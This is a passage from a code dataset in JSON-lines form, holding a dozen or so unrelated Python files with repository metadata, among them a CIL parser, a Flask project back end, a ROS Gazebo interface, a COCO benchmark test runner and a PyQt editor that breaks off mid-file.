short')\n","repo_name":"StudioAquatan/hacku2020","sub_path":"light_control/negative.py","file_name":"negative.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70987444906","text":"from .common import Element\nfrom .method_element import MethodElement\n\n\nclass FieldElement(Element):\n def __init__(self, lines, start):\n Element.__init__(self, lines[start][1:], {\n 0: 'type',\n 1: 'name'\n }, ['private', 'hidebysig'])\n self.end = start\n\n\nclass ClassElement(Element):\n def __init__(self, lines, start):\n # Call parent constructor\n # private, auto, etc are flags\n # With flags and .class ignored, class name is the\n # first token encountered (#0), 'extends' is #1,\n # parent class name is #2.\n Element.__init__(self, lines[start][1:], {\n 0: 'name',\n 2: 'superclass'\n }, ['private', 'auto', 'ansi', 'beforefieldinit'])\n\n self.fields = []\n self.methods = []\n\n # Consume fields and methods from lines until '}' is reached\n start += 1\n while start < len(lines):\n token = lines[start][0]\n if token == '}':\n break\n elif token == '.field':\n self.fields.append(FieldElement(lines, start))\n start = self.fields[-1].end\n elif token == '.method':\n self.methods.append(MethodElement(lines, start))\n start = self.methods[-1].end\n start += 1\n # Set self.end so that the parent Element knows at what line\n # the class stops\n self.end = start\n\n","repo_name":"lukedsmalley/oo-kernel-hacking","sub_path":"src/ciltool/class_element.py","file_name":"class_element.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"3393355187","text":"import logging\nimport numpy as np\nimport os\nimport pickle\nimport scipy.sparse as sp\nimport sys\n# import tensorflow as tf\n\nfrom scipy.sparse import linalg\n\n\nclass DataLoader(object):\n def __init__(self, xs, ys, batch_size, pad_with_last_sample=True, shuffle=False):\n \"\"\"\n\n :param xs:\n :param ys:\n :param batch_size:\n :param pad_with_last_sample: pad with the last sample to make number of samples divisible to batch_size.\n \"\"\"\n self.batch_size = batch_size\n self.current_ind = 0\n if pad_with_last_sample:\n 
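# number of copies of the last sample needed to make len(xs) an exact multiple of batch_size\n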
num_padding = (batch_size - (len(xs) % batch_size)) % batch_size\n x_padding = np.repeat(xs[-1:], num_padding, axis=0)\n y_padding = np.repeat(ys[-1:], num_padding, axis=0)\n xs = np.concatenate([xs, x_padding], axis=0)\n ys = np.concatenate([ys, y_padding], axis=0)\n self.size = len(xs)\n self.num_batch = int(self.size // self.batch_size)\n if shuffle:\n permutation = np.random.permutation(self.size)\n xs, ys = xs[permutation], ys[permutation]\n self.xs = xs\n self.ys = ys\n\n def get_iterator(self):\n self.current_ind = 0\n\n def _wrapper():\n while self.current_ind < self.num_batch:\n start_ind = self.batch_size * self.current_ind\n end_ind = min(self.size, self.batch_size * (self.current_ind + 1))\n x_i = self.xs[start_ind: end_ind, ...]\n y_i = self.ys[start_ind: end_ind, ...]\n yield (x_i, y_i)\n self.current_ind += 1\n\n return _wrapper()\n\n\nclass StandardScaler:\n \"\"\"\n Standardize the input\n \"\"\"\n\n def __init__(self, mean, std):\n self.mean = mean\n self.std = std\n\n def transform(self, data):\n return (data - self.mean) / self.std\n\n def inverse_transform(self, data):\n return (data * self.std) + self.mean\n\ndef latent_input(dataset_dir, batch_size, test_batch_size=None, **kwargs):\n data = {}\n for category in ['train', 'val', 'test']:\n cat_data = np.load(os.path.join(dataset_dir, category + '.npz'))\n data['x_' + category] = cat_data['x']\n data['y_' + category] = cat_data['y']\n print('1: \\n', data['x_' + category].shape, data['y_' + category].shape)\n scaler = StandardScaler(mean=data['x_train'][..., 0].mean(), std=data['x_train'][..., 0].std())\n # Data format\n for category in ['train', 'val', 'test']:\n data['x_' + category][..., 0] = scaler.transform(data['x_' + category][..., 0])\n data['y_' + category][..., 0] = scaler.transform(data['y_' + category][..., 0])\n print('2: \\n', data['x_' + category].shape, data['y_' + category].shape)\n data['train_loader'] = DataLoader(data['x_train'], data['y_train'], batch_size, shuffle=True)\n # data['val_loader'] = DataLoader(data['x_val'], data['y_val'], test_batch_size, shuffle=False)\n # data['test_loader'] = DataLoader(data['x_test'], data['y_test'], test_batch_size, shuffle=False)\n data['scaler'] = scaler\n # print('3: \\n', data['train_loader'].size)\n\n return data\n\n\ndata = latent_input('/mnt/sdb/yujia/DCRNN_PyTorch/data_pm/bpi12_3000_equitemp_45', 4)\n\nfor i, (x, y) in enumerate(data['train_loader'].get_iterator()):\n print(x.shape, y.shape)","repo_name":"YujiaHu0819/GNN_PM","sub_path":"DCRNN_PM/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22501073407","text":"from sanic import Blueprint\nfrom sanic.response import json\n\nbp = Blueprint('api', url_prefix='/api')\n\n\n@bp.get('/')\nasync def 
api_status(request):\n args = request.args\n print(args)\n res = {\n 'msg': 'OK',\n }\n return json(res)\n","repo_name":"zhengzhou-happywind/api_on_sanic","sub_path":"src/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31197886450","text":"from django.shortcuts import render\nfrom .models import Content\n\n\ndef index(request):\n items = Content.objects.order_by('-upload_at').all()\n context = {\n 'items': items\n }\n return render(request, 'app/index.html', context)","repo_name":"daikiante/heroku","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36357233821","text":"import json\nimport requests\nfrom collections import defaultdict\n\ndef main():\n data = requests.get('http://mysafeinfo.com/api/data?list=englishmonarchs&format=json').json()\n d = defaultdict(lambda: defaultdict(set))\n for k in data:\n d[k['cty']][k['hse']].add(k['nm'])\n\n def serialize(obj):\n if isinstance(obj, set):\n return list(obj)\n raise TypeError('%r is not JSON serializable' % obj)\n print(json.dumps(d, default=serialize))\n\nif __name__ == '__main__':\n main()\n","repo_name":"pnihar/Python-scripts-answers","sub_path":"answer1.py","file_name":"answer1.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22462940125","text":"from conans import ConanFile, tools\nimport os\n\nclass TestPackageConan(ConanFile):\n settings = 'os', 'arch', 'build_type'\n\n def build(self):\n pass\n\n def test(self):\n if self.settings.os == 'Windows':\n libs = ['winpr3.lib']\n else:\n libs = ['libwinpr3.a']\n headers = [\n 'sam.h', 'error.h', 'strlst.h', 'input.h', 'winsock.h',\n 'debug.h', 'shell.h', 'pack.h', 'tools/makecert.h', 'version.h',\n 'pool.h', 'sspi.h', 'synch.h', 'timezone.h',\n 'nt.h', 'library.h', 'path.h', 'endian.h', 'security.h',\n 'sysinfo.h', 'file.h', 'cmdline.h', 'winpr.h', 'comm.h', 'stream.h',\n 'sspicli.h', 'registry.h', 'crypto.h', 'windows.h',\n 'environment.h', 'ini.h', 'spec.h', 'ntlm.h', 'intrin.h',\n 'ssl.h', 'thread.h', 'bitstream.h', 'wlog.h', 'handle.h', 'io.h',\n 'user.h', 'clipboard.h', 'pipe.h', 'print.h',\n 'wtsapi.h', 'crt.h', 'interlocked.h', 'memory.h', 'rpc.h',\n 'wtypes.h', 'dsparse.h', 'schannel.h', 'tchar.h', 'smartcard.h',\n 'platform.h', 'image.h', 'bcrypt.h', 'collections.h',\n 'string.h'\n ]\n\n self.output.info('Testing libraries exist:')\n for lib in libs:\n file_path = os.path.join(self.deps_cpp_info['winpr'].rootpath, 'lib', lib)\n\n self.output.info('- %s' % file_path)\n assert os.path.isfile(file_path), 'Missing file: %s' % file_path\n\n self.output.info('Testing headers exist:')\n for header in headers:\n file_path = os.path.join(self.deps_cpp_info['winpr'].rootpath, 'include', 'winpr', header)\n\n self.output.info('- %s' % file_path)\n assert os.path.isfile(file_path), 'Missing file: %s' % file_path\n","repo_name":"Devolutions/conan-public","sub_path":"recipes/winpr/test_package/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"17678492586","text":"import twint\nfrom 
transformers import pipeline\nimport numpy as np\n\ntweets = []\nc = twint.Config()\nc.Username = \"lexfridman\"\nc.Limit = 1000\nc.Store_object = True\nc.Hide_output = True\nc.Store_object_tweets_list = tweets\ntwint.run.Search(c)\n\nprint(f\"Tweets fetched: {len(tweets)}\")\nclassifier = pipeline('sentiment-analysis')\nresults = classifier([t.tweet for t in tweets])\n\npositive = [r for r in results if r['label'] == 'POSITIVE']\nnegative = [r for r in results if r['label'] == 'NEGATIVE']\nprint(f\"Positive: {len(positive) / float(len(results)) * 100}% \"\n f\"with average score {np.round(np.sum([r['score'] for r in positive]) / float(len(positive)), 4)}\")\nprint(f\"Negative: {len(negative) / float(len(results)) * 100}% \"\n f\"with average score {np.round(np.sum([r['score'] for r in negative]) / float(len(negative)), 4)}\")\n\n# Output:\n# Tweets fetched: 1000\n# Positive: 62.4% with average score 0.9574\n# Negative: 37.6% with average score 0.9298\n","repo_name":"dredwardhyde/nlp-models-examples","sub_path":"twitter_toxicity.py","file_name":"twitter_toxicity.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"37"} +{"seq_id":"36599016403","text":"\"\"\"This server returns a particuarly large response.\"\"\"\nimport asyncio\nimport threading\nimport sys\nfrom concurrent.futures import ThreadPoolExecutor\n\nfrom pygls.server import aio_readline\n\n\ndef handler(data):\n payload = dict(\n jsonrpc=\"2.0\",\n id=1,\n result=dict(\n numbers=list(range(100_000)),\n ),\n )\n content = str(payload).replace(\"'\", '\"')\n message = f\"Content-Length: {len(content)}\\r\\n\\r\\n{content}\".encode(\"utf8\")\n\n sys.stdout.buffer.write(message)\n sys.stdout.flush()\n\n\nasync def main():\n await aio_readline(\n asyncio.get_running_loop(),\n ThreadPoolExecutor(),\n threading.Event(),\n sys.stdin.buffer,\n handler,\n )\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"openlawlibrary/pygls","sub_path":"tests/servers/large_response.py","file_name":"large_response.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":446,"dataset":"github-code","pt":"37"} +{"seq_id":"26615802323","text":"a, b, c = map(int, input().split())\n_max = a + b + c\n\nA = [a, b, c]\nA.sort()\na, b, c = A\n_min = 0 if a + b > c else c - a - b\n\n\nimport math\n\nPI = math.pi\n\nans = (_max ** 2 - _min ** 2) * PI\nprint(ans)\n","repo_name":"mei28/Competitive-programing","sub_path":"mujin_pc_2016/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10192978412","text":"#!/usr/bin/env python\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport shutil\nimport doctest\nimport numpy as np\nimport cocoex as ex\nfrom cocoex import Suite\nfrom cocoex.utilities import about_equal\nfrom cocoex import known_suite_names\nimport example_experiment\n\ndefault_testcases = [\"bbob2009_testcases.txt\"]\n\ndef read_test_vectors(fd):\n \"\"\"\n Read the number of test vectors, followed by the 40D test vectors\n from ${fd}. 
Return a list of numpy arrays containing the test vectors.\n \"\"\"\n number_of_test_vectors = int(fd.readline().rstrip())\n ## Preallocate the testvectors list\n test_vectors = number_of_test_vectors * [None]\n for i in range(number_of_test_vectors):\n line = fd.readline().rstrip()\n test_vectors[i] = np.fromstring(line, dtype=float, sep=\" \")\n return test_vectors\n\ndef process_test_cases(fd, suite_name, test_vectors):\n \"\"\"\n Read test cases for benchmark suite ${suite_name} from ${fd} and evaluate them.\n \"\"\"\n number_of_testcases = 0\n number_of_failures = 0\n previous_problem_index = None\n suite = Suite(suite_name, \"instances:1-15\", \"\")\n print(\"Testing suite\", suite_name)\n for test_case in fd:\n number_of_testcases += 1\n\n ## A test case is a 4-tuple (deprecated_problem_index, problem_index, test_vector_id,\n ## expected_y) separated by a tab.\n deprecated_problem_index, problem_index, test_vector_id, expected_y = test_case.split()\n ## Do type conversion. Python gurus probably know an elegant\n ## one line solution...\n problem_index = int(problem_index)\n test_vector_id = int(test_vector_id)\n expected_y = float(expected_y)\n\n ## We cache the problem instances because creating an instance\n ## can be expensive depending on the transformation.\n if problem_index != previous_problem_index:\n problem = suite.get_problem(int(problem_index))\n previous_problem_index = problem_index\n test_vector = test_vectors[test_vector_id]\n y = problem(test_vector[:problem.number_of_variables])\n if not about_equal(y, expected_y, 4e-6):\n number_of_failures += 1\n if number_of_failures < 100:\n print(\"%8i %8i FAILED expected=%.8e observed=%.8e\" % (problem_index, test_vector_id, expected_y, y))\n elif number_of_failures == 100:\n print(\"... 
further failed tests suppressed ...\")\n print(\"%i of %i tests passed (failure rate %.2f%%)\" % (number_of_testcases - number_of_failures, number_of_testcases, (100.0 * number_of_failures) / number_of_testcases))\n if number_of_failures > 0:\n sys.exit(-1)\n\ndef process_testfile(testfile):\n with open(testfile, \"r\") as fd:\n test_suite = fd.readline().rstrip()\n test_vectors = read_test_vectors(fd)\n process_test_cases(fd, test_suite, test_vectors)\n\ndef testmod(module):\n \"\"\"`doctest`s `testmod` method with `raise_on_error=True` setting\"\"\"\n print(\" doctest of %s\" % str(module))\n doctest.testmod(module, # optionflags=doctest.ELLIPSIS,\n raise_on_error=True)\n\ndef best_parameter(f):\n f._best_parameter('print')\n with open('._bbob_problem_best_parameter.txt', 'rt') as file_:\n return [float(s) for s in file_.read().split()]\n\ndef run_constrained_suite_test():\n from collections import defaultdict\n try:\n suite = Suite('bbob-constrained', '', '')\n except NameError:\n return\n counts = defaultdict(int)\n for f in suite:\n counts[-5] += np.any(f.initial_solution < -5)\n counts[5] += np.any(f.initial_solution > 5)\n counts['c'] += np.any(f.constraint(f.initial_solution) > 0)\n counts['b'] += np.any(f.constraint(best_parameter(f)) > 1e-11) # mac: 6.8361219664552603e-12 is the largest value\n assert sum(counts.values()) == 0\n\ndef run_doctests():\n \"\"\"Run doctests on \"all\" modules.\n\n To include this in a unittest environment,\n see https://docs.python.org/2/library/doctest.html#unittest-api\n \"\"\"\n interface = ex.interface if hasattr(ex, 'interface') else ex._interface\n testmod(ex)\n if not sys.version.startswith('3'):\n print(\" CAVEAT: doctest OF cocoex.interface IS, FOR SOME REASON, \" +\n \"INEFFECTIVE IN PYTHON 2 \")\n testmod(interface)\n testmod(example_experiment)\n\n\ndef _clean_up(folder, start_matches, protected):\n \"\"\"permanently remove entries in `folder` which begin with any of\n `start_matches`, where `\"\"` matches any string, and which are not in\n `protected`.\n\n CAVEAT: use with care, as with `\"\", \"\"` as second and third arguments\n this deletes all folder entries like `rm *` does. 
\"\"\"\n if not os.path.isdir(folder):\n return\n if not protected and \"\" in start_matches:\n raise ValueError(\n '_clean_up(folder, [..., \"\", ...], []) is not permitted, resembles \"rm *\"')\n for d in os.listdir(folder):\n if d not in protected:\n for name in start_matches:\n if d.startswith(name):\n shutil.rmtree(os.path.join(folder, d))\n break\n\n\ndef main(args):\n list_before = os.listdir('exdata') if os.path.isdir('exdata') else []\n print('Running doctests...'), sys.stdout.flush()\n run_doctests()\n print('doctests done.\\nRunning example_experiment:'), sys.stdout.flush()\n example_experiment.main()\n if \"bbob-constrained\" in known_suite_names:\n run_constrained_suite_test()\n for arg in args if args else default_testcases:\n if arg is None or arg == 'None':\n break\n process_testfile(arg) if args or os.path.isfile(arg) else None\n _clean_up('exdata', ['random_search_on_bbob', 'doctest', 'default'], list_before)\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"numbbo/coco","sub_path":"code-experiments/build/python/coco_test.py","file_name":"coco_test.py","file_ext":"py","file_size_in_byte":5887,"program_lang":"python","lang":"en","doc_type":"code","stars":232,"dataset":"github-code","pt":"37"} +{"seq_id":"16160845693","text":"from states.menus import menu\n\nclass WinScreen(menu.Menu):\n\n def __init__(self, screen_height, screen_width, name):\n\n self.menuItems = [\n {\"Text\" : \"You Made It\", \"Font\" : 1, \"Link\": False, \"Position\" : {}},\n {\"Text\" : \"\", \"Font\" : 0, \"Link\": False, \"Position\" : {}},\n {\"Text\" : \"Play Again\", \"Font\" : 0, \"Link\": \"Level Menu\", \"Position\" : {}},\n {\"Text\" : \"Main Menu\", \"Font\" : 0, \"Link\": \"Main Menu\", \"Position\" : {}}\n ]\n menu.Menu.__init__(self, screen_height, screen_width, name)\n","repo_name":"jcfug8/pygame_state_controller","sub_path":"states/menus/win_screen.py","file_name":"win_screen.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21150419024","text":"class Solution:\n def numberOfBoomerangs(self, points: List[List[int]]) -> int:\n # Time Complexity: O(N^2)\n # Space Complexity: O(N)\n\n dist_cnt = [Counter() for i in range(len(points))]\n\n ret = 0\n for i in range(len(points)):\n for j in range(i + 1, len(points)):\n fst, snd = points[i], points[j]\n\n dist_sq = (fst[0] - snd[0]) ** 2 + (fst[1] - snd[1]) ** 2\n ret += dist_cnt[i][dist_sq] + dist_cnt[j][dist_sq]\n\n dist_cnt[i][dist_sq] += 1\n dist_cnt[j][dist_sq] += 1\n\n return ret * 2\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/447. 
Number of Boomerangs/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"23694734076","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport rospy\nimport tf2_ros\nimport common\n\nfrom jaco_msgs.msg import JointVelocity\nfrom std_msgs.msg import Float64\nfrom nav_msgs.msg import Odometry\nfrom sensor_msgs.msg import JointState\nfrom geometry_msgs.msg import TwistStamped\nfrom utils.util_functions import init_tf_stamped, pose2transform\nfrom utils.data_container import DataContainer\n\nREMAPPABLE_NODE_NAME = 'gazebo_interface'\n\nPARAM_NAME_MOBILE_VW_CMD_TOPIC = '~bs_vw_cmd_topic'\nPARAM_NAME_JOINT1_CMD_TOPIC = '~joint1_cmd_topic'\nPARAM_NAME_JOINT2_CMD_TOPIC = '~joint2_cmd_topic'\nPARAM_NAME_JOINT3_CMD_TOPIC = '~joint3_cmd_topic'\nPARAM_NAME_JOINT4_CMD_TOPIC = '~joint4_cmd_topic'\nPARAM_NAME_JOINT5_CMD_TOPIC = '~joint5_cmd_topic'\nPARAM_NAME_JOINT6_CMD_TOPIC = '~joint6_cmd_topic'\nPARAM_NAME_JOINT_STATE_TOPIC = '~joint_state_topic'\nPARAM_NAME_BS_STATE_TOPIC = '~bs_state_topic'\nPARAM_NAME_JOINTVEL_INPUT_TOPIC = '/mico_jointvel_input_topic'\nPARAM_NAME_BS_INPUT_TOPIC = '/blackship_input_topic'\nPARAM_NAME_ARM_JOINT_STATE_TOPIC = '/mico_jointstate_output_topic'\nPARAM_NAME_MOBILE_WHEEL_RADIUS = '/mobile_wheel_radius'\nPARAM_NAME_MOBILE_AXLE_TRACK = '/mobile_axle_track'\n\n\nclass MicoBlackshipGazeboInterface(object):\n def __init__(self):\n self._mobile_vel_cmd_publisher = rospy.Publisher(rospy.get_param(PARAM_NAME_MOBILE_VW_CMD_TOPIC,\n default=PARAM_NAME_MOBILE_VW_CMD_TOPIC[1:]),\n TwistStamped, queue_size=1)\n self._joint_vel_cmd_publishers = []\n\n param_names = [PARAM_NAME_JOINT1_CMD_TOPIC, PARAM_NAME_JOINT2_CMD_TOPIC, PARAM_NAME_JOINT3_CMD_TOPIC,\n PARAM_NAME_JOINT4_CMD_TOPIC, PARAM_NAME_JOINT5_CMD_TOPIC, PARAM_NAME_JOINT6_CMD_TOPIC]\n self._joint_vel_cmd_publishers = [rospy.Publisher(rospy.get_param(param_name, default=param_name[1:]),\n Float64, queue_size=1) for param_name in param_names]\n self._js_publisher = rospy.Publisher(rospy.get_param(PARAM_NAME_ARM_JOINT_STATE_TOPIC),\n JointState, queue_size=1)\n self._joint_state = JointState()\n self.Rw = rospy.get_param(PARAM_NAME_MOBILE_WHEEL_RADIUS)\n self.T = rospy.get_param(PARAM_NAME_MOBILE_AXLE_TRACK)\n self._robot_vel_cur_container = DataContainer('RobotVelCur', data_class=list,\n header_list=['j1', 'j2', 'j3', 'j4', 'j5', 'j6', 'v', 'w'])\n\n def activate(self):\n rospy.Subscriber(rospy.get_param(PARAM_NAME_BS_INPUT_TOPIC,\n default=PARAM_NAME_BS_INPUT_TOPIC[1:]),\n TwistStamped, self._mobile_vel_callback)\n rospy.Subscriber(rospy.get_param(PARAM_NAME_JOINTVEL_INPUT_TOPIC,\n default=PARAM_NAME_JOINTVEL_INPUT_TOPIC[1:]),\n JointVelocity, self._joint_vel_callback)\n rospy.Subscriber(rospy.get_param(PARAM_NAME_JOINT_STATE_TOPIC,\n default=PARAM_NAME_JOINT_STATE_TOPIC[1:]),\n JointState, self._joint_state_callback)\n rospy.Subscriber(rospy.get_param(PARAM_NAME_BS_STATE_TOPIC,\n default=PARAM_NAME_BS_STATE_TOPIC[1:]),\n JointState, self._bs_state_callback)\n return self\n\n def _mobile_vel_callback(self, twist_stamped):\n self._mobile_vel_cmd_publisher.publish(twist_stamped)\n\n def _joint_vel_callback(self, joint_vel):\n for attr, publisher in zip(JointVelocity.__slots__, self._joint_vel_cmd_publishers):\n publisher.publish(Float64(data=getattr(joint_vel, attr)))\n\n def _joint_state_callback(self, js):\n self._joint_state = js\n self._js_publisher.publish(js)\n\n def 
_bs_state_callback(self, js):\n thetal_dot = (js.velocity[0] + js.velocity[2]) * 0.5\n thetar_dot = (js.velocity[1] + js.velocity[3]) * 0.5\n v = (thetal_dot + thetar_dot) * self.Rw /2\n w = (thetal_dot - thetar_dot) * self.Rw / self.T\n self._robot_vel_cur_container.write(list(self._joint_state.velocity) + [v, w])\n\n# --------------------------------------------\nif __name__ == '__main__':\n rospy.init_node(REMAPPABLE_NODE_NAME, anonymous=True)\n gazebo_if = MicoBlackshipGazeboInterface().activate()\n rospy.spin()\n","repo_name":"mu-777/predictive_display_for_mobile_manipulator","sub_path":"mobile_manipulator_simulator/src/mico_bs_gazebo_interface.py","file_name":"mico_bs_gazebo_interface.py","file_ext":"py","file_size_in_byte":4497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17370786112","text":"from flask import Flask, request, send_file\nfrom flask_cors import CORS\nfrom copy import deepcopy\nimport json\nimport os\nfrom dotenv import load_dotenv\nfrom code_generation.code_generator_eip import create_routes\nfrom code_generation.code_generator_kalei import create_kalei\nfrom code_generation.parser import parse\nfrom code_generation.project_generator_eip import create_project\nfrom code_generation.project_generator_kalei import generate_and_eval_kalei\nfrom project_storage.project_storage import saveProject, loadProject, getAllProjectsFromClient\nfrom user_storage.user_storage import clientLogin, addClient, createTables\nfrom uuid import uuid4\nfrom datetime import timedelta\nfrom errors import InvalidClientEmail\nimport redis\n\napp = Flask(__name__)\napp.secret_key = str(uuid4())\n\nload_dotenv()\n\nCORS(app)\n\nr = redis.Redis(host=os.environ['REDIS_HOST'],\n port=os.environ['REDIS_PORT'], password=os.environ['REDIS_PASSWORD'])\n\n# session = {}\n# user_generated_files = {}\nr.set('session', json.dumps({}))\nr.set('user_generated_files', json.dumps({}))\n\ndef check_logged_session(request):\n session = json.loads(r.get('session'))\n print(\"check_logged_session\")\n print(session)\n client_email = request.json['client_email']\n print(\"client_email\")\n print(client_email)\n\n # # TEMP\n # return True\n \n if client_email in session:\n return True\n else:\n return False\n\ndef add_user_generated_file(request, file_name):\n client_email = request.json['client_email']\n\n user_generated_files = json.loads(r.get('user_generated_files'))\n if client_email not in user_generated_files:\n user_generated_files[client_email] = []\n\n user_generated_files[client_email].append(file_name)\n r.set('user_generated_files', json.dumps(user_generated_files))\n\ndef remove_user_generated_files(request):\n client_email = request.json['client_email']\n\n user_generated_files = json.loads(r.get('user_generated_files'))\n\n if client_email in user_generated_files:\n for f in user_generated_files[client_email]:\n os.remove(os.path.join(\"projetos_gerados\", f))\n\n user_generated_files.pop(client_email, None)\n r.set('user_generated_files', json.dumps(user_generated_files))\n\n@app.route('/')\ndef index():\n return \"TCC back-end\"\n\n@app.route('/generate_code', methods=['POST'])\ndef generate_code():\n print(\"GENERATE CODE\")\n print(request.json)\n logged = check_logged_session(request)\n if not logged:\n print(\"NOT LOGGED\")\n return {\"logged\": False}\n\n items_info = {}\n\n items = request.json['items']\n positions = request.json['positions']\n project_type = request.json['type']\n\n print(\"ITEMS\", items)\n print(\"POSITIONS\", 
positions)\n\n for itemKey in items:\n items_info[itemKey] = items[itemKey]\n items_info[itemKey][\"connectsTo\"] = positions[itemKey]['connectsTo']\n\n print(\"items info\", items_info)\n\n if project_type == \"EIP\":\n routes = \"\"\n dependencies = \"\"\n parsed = parse(items_info)\n # Parse\n if (parsed[0]):\n print(\"Parser OK\")\n # Generate Code\n routes, dependencies = create_routes(items_info)\n print(routes, dependencies)\n zip_project = create_project(\"com.opus\", \"projetoAutomatico\", routes, dependencies)\n add_user_generated_file(request, zip_project + \".zip\")\n return json.dumps({\"routes\": routes, \"fileName\": zip_project}), 200\n else:\n print({\"error\": parsed[1], \"fileName\": \"\"})\n return json.dumps({\"error\": parsed[1], \"fileName\": \"\"}), 200\n\n\n elif project_type == \"KALEI\":\n codes, _ = create_kalei(items_info)\n result, file_name = generate_and_eval_kalei(codes)\n add_user_generated_file(request, file_name + \".ll\")\n return json.dumps({\"code\": codes, \"result\": result, \"fileName\": file_name}), 200\n\n@app.route('/download_project', methods=['GET'])\ndef download_project():\n fileName = request.args.get('fileName')\n\n project_type = request.args.get('type')\n \n if project_type == \"EIP\":\n fileName += \".zip\"\n attach_filename = \"IntegrationProject.zip\"\n elif project_type == \"KALEI\":\n fileName += \".ll\"\n attach_filename = \"KaleidoscopeIR.ll\"\n\n return send_file(os.path.join(\"projetos_gerados\", fileName), attachment_filename=attach_filename, as_attachment=True), 200\n\n\n@app.route('/save_project', methods=['POST'])\ndef save_project():\n print(\"SAVE PROJECT\")\n\n print(request.json)\n logged = check_logged_session(request)\n if not logged:\n return {\"logged\": False}\n\n\n saveProject(request.json)\n\n return {}\n\n@app.route('/open_project', methods=['POST'])\ndef open_project():\n logged = check_logged_session(request)\n if not logged:\n return {\"logged\": False}\n\n client_email = request.json[\"client_email\"]\n project_name = request.json[\"project_name\"]\n print(client_email, project_name)\n\n projeto = loadProject(client_email, project_name)\n return projeto\n\n@app.route('/projects', methods=['GET'])\ndef projects():\n client_email = request.args.get('client_email')\n print(client_email)\n\n try:\n projects = getAllProjectsFromClient(client_email)\n names = []\n print(projects)\n print(names)\n\n for proj in projects:\n names.append(proj['project_name'])\n\n return json.dumps({\"project_names\": names}), 200\n\n except InvalidClientEmail as e:\n return json.dumps({\"error\": e.title, \"status\": e.status, \"message\": e.message}), e.status\n\n\n# Login Section\n\n@app.route('/login', methods=['POST'])\ndef login():\n email = request.json['client_email']\n password = request.json['pass']\n logged = clientLogin(email, password)\n \n session = json.loads(r.get('session'))\n\n if logged:\n session[email] = email\n r.set('session', json.dumps(session))\n print(\"LOGIN\")\n print(session)\n return json.dumps({\"logged\": True, \"email\": email}), 200\n else:\n return json.dumps({\"logged\": False}), 200\n\n@app.route('/signup', methods=['POST'])\ndef signup():\n email = request.json['client_email']\n password = request.json['pass']\n signedup = addClient(email, password)\n\n session = json.loads(r.get('session'))\n if signedup:\n session[email] = email\n r.set('session', json.dumps(session))\n return json.dumps({\"signedup\": True, \"email\": email}), 200\n else:\n return json.dumps({\"signedup\": False}), 
200\n\n@app.route('/logout', methods=['POST'])\ndef logout():\n email = request.json['client_email']\n session = json.loads(r.get('session'))\n if email in session:\n remove_user_generated_files(request)\n session.pop(email, None)\n r.set('session', json.dumps(session))\n print(\"LOGOUT\")\n print(session)\n \n return json.dumps({\"logged\": False, \"email\": email}), 200\n\n\n@app.route('/islogged', methods=['POST'])\ndef islogged():\n print(\"IS_LOGGED?\")\n email = request.json['client_email']\n session = json.loads(r.get('session'))\n print(email)\n print(session)\n if email in session:\n return json.dumps({\"logged\": True, \"email\": email}), 200\n else:\n return json.dumps({\"logged\": False}), 200\n\nif __name__ == '__main__':\n app.run(debug=True, port=5000)\n","repo_name":"rodipm/TccOpus","sub_path":"back/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36292472226","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nimport sys\n\n# Metin Düzenleyici\n\nclass Window(QWidget):\n def __init__(self, title, shape, icon):\n super().__init__()\n self.title = title\n self.x, self.y, self.w, self.h = shape\n self.icon = QIcon(icon)\n self.file = \"\"\n self.vbox = QVBoxLayout()\n self.initUI()\n self.setLayout(self.vbox)\n self.show()\n\n def initUI(self):\n self.setWindowTitle(self.title)\n self.setWindowIcon(self.icon)\n self.setGeometry(self.x, self.y, self.w, self.h)\n self.setFont(QFont(\"Arial\", 11))\n\n hbox = QHBoxLayout()\n \n self.todo_text = QTextEdit()\n\n self.btns = QVBoxLayout()\n\n self.open_file = QPushButton(text=\"Open Folder\", clicked=self.OpenFile)\n self.open_file.setFixedWidth(200)\n self.btns.addWidget(self.open_file)\n\n self.save_file = QPushButton(text=\"Save\", clicked=self.SaveFile)\n self.save_file.setFixedWidth(200)\n self.btns.addWidget(self.save_file)\n self.btns.addStretch()\n\n hbox.addLayout(self.btns)\n 